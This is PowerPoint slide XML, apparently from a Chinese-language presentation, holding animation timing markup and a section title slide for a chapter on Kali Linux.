                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="22" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2549"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="23" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="34" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3799"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="35" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="38" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="39" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="46" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5050"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="47" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="50" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5550"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="51" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="58" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="7600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="59" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105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21" grpId="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="3" grpId="1"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="10" grpId="1"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="11" grpId="1"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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等腰三角形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-354902" y="1593655"/>
            <a:ext cx="2812747" cy="2101740"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859264" y="2678072"/>
            <a:ext cx="5245100" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>章</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Kali Linux</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="等腰三角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="10384747" y="2655849"/>
            <a:ext cx="2069408" cy="1546303"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="等腰三角形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-436508" y="2327919"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47928" y="2883669"/>
            <a:ext cx="1612900" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>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6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
